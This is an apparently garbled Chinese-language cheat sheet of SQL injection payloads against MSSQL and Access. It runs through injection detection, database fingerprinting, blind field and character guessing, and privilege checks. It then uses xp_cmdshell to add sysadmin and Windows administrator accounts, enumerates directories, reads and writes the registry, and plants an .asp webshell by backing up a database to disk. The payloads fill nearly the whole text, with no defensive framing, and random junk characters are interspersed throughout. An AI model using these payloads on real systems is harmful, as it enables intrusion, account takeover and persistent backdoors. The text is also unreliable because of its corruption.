1.判断是否有注入;and 1=1 ;and 1=2 {!1n5a3" 1
2.初步判断是否是mssql ;and user>0 Rca
Os
$SzCVWS
3.注入参数是字符'and [查询条件] and ''=' A>t!/_"
zI&4k..4
4.搜索时没过滤参数的'and [查询条件] and '%25'=' zQ5jx5B":
C^" Hj
5.判断数据库系统 O)xEF~DaD
|SP.S 0.y
;and (select count(*) from sysobjects)>0 mssql tnF9Vj[#%_
aE\BAbD7
;and (select count(*) from msysobjects)>0 access ?4>y2!OC9
Bdq"6SK>
Flujwh@rg
k,R~oSA'n
6.猜数据库 ;and (select Count(*) from [数据库名])>0 9LEilmPs
id tQXwa
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 |5IY`;+9
)~.&bEm\
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 Pkx(M E
{,f!'i&b@
9.(1)猜字段的ascii值(access) v^],loi<V
<`xRqe:&9
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 aY[ 0A_
mU+FQX
(2)猜字段的ascii值(mssql) ,AbKxT
f2
:@>br+S
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Dd#
SUQ
SZ2q}[o`R
10.测试权限结构(mssql) }C{}oLz
6Sb'Otw.
(: TGe v
+:"6`um|
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- *lerPY3 q
^[seK)S=
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- r$r&4dY
k~jKJb-_
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- L_gsG|xX
aC,vh1")F
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- < k+fKl
e.}3OK
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- *mQDS.'AB@
RC8)f8n
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- QFNz9c
^?6
W<
;and 1=(select IS_MEMBER('db_owner'));-- {rb-DB-/5M
q3x;_y^
Q}Ze-JIL$
Ie2w0Cs28
11.添加mssql和系统的帐户 .hQ3A"
=tf@4_
;exec master.dbo.sp_addlogin username;-- [)H,zpl
;exec master.dbo.sp_password null,username,password;-- 11B{gUv.]
O&3r*vd
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- /h7>Z9T
b>bgUDq
;exec master.dbo.xp_cmdshell 'net user username password 2%5^Fi
?79SP p)oo
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- urT/+deR
oBRm\8 2|
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 8tV=fSHd
v#:+n+y\z
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- w%8ooQ|C
Krp
<bK6
Zr.\`mG4f
vNC$f(cQ
12.(1)遍历目录 =wIdC3Ph
Y|m_qB^_
;create table dirs(paths varchar(100), id int) qD(fYOX{C
bIb6yVnHi
;insert dirs exec master.dbo.xp_dirtree 'c:\' u+mjguIv
Q$?7) yyu+
;and (select top 1 paths from dirs)>0 *#Lsjk~_-
G>=9gSLM
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) s<Ex"+
ReI=4Jq11
N?a1sdR
P&[F t)`
(2)遍历目录 NIGB[2V(
mh
A~eJ
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 'ZGT`'ri
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 hF{x')(#l
jU]]:S4xD/
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 `P ^u:
{k_ PMl0G
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 o%V
@D'w
[!J
@a
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 Q?
<-`7
?qf:_G
ch0oFc$
:(bdI]
13.mssql中的存储过程 3 {NaZIk
2?Pt Z
xp_regenumvalues 注册表根键, 子键 Q$xa
Em~7D]Y
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 V17>j0Ev$W
9tzoris[~
xp_regread 根键,子键,键值名 KjFZ
ig{A[7qN
;exec xp_regread iUeV5cB
--in+
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 C2+{U
?(5o@Xq
xp_regwrite 根键,子键, 值名, 值类型, 值 U6c)"^\
gt
=j5
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 XGE
2J
tJUVw=
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 b4Ricm
3)6+1Yc
xp_regdeletevalue 根键,子键,值名 Y%78>-2L
4*0:bhhhf_
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 vnz[w=U
z$9@j2
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 rQ`\JE&`
~A8qeaP
QuSV&>T\
X|X4L(i
14.mssql的backup创建webshell 8O~0RYk
;Ay>+M2O
use model y]yine
F;IP3tD
create table cmd(str image); =LlLE<X"%x
8K|J:[7
insert into cmd(str) values (''); i/NDWVFD
1i4WWK7k
backup database model to disk='c:\l.asp'; tlDYk
f=t:[<
)
O4m(Er@a
rpUy$qrRc
15.mssql内置函数 *,"jF!C&[
LMAmpVo
;and (select @@version)>0 获得Windows的版本号 i~9?:plS
yt. f!"
;and user_name()='dbo' 判断当前系统的连接用户是不是sa qOW#Q:T
3Bejp+xX
;and (select user_name())>0 爆当前系统的连接用户 FXS^^p
P
n%F-cw
;and (select db_name())>0 得到当前连接的数据库 RG&I\DTyt
W0Ktw6
#"::
'?,
tC^ 1}
16.简洁的webshell ^uia`sOP4
A'GlCp
use model |)9thIQF
vwVVBG;t
create table cmd(str image); -^yXLa;D
gdl| ^*tc
insert into cmd(str) values (''); 2R~6<W+&:>
{{32jU7<
backup database model to disk='g:\wwwtest\l.asp';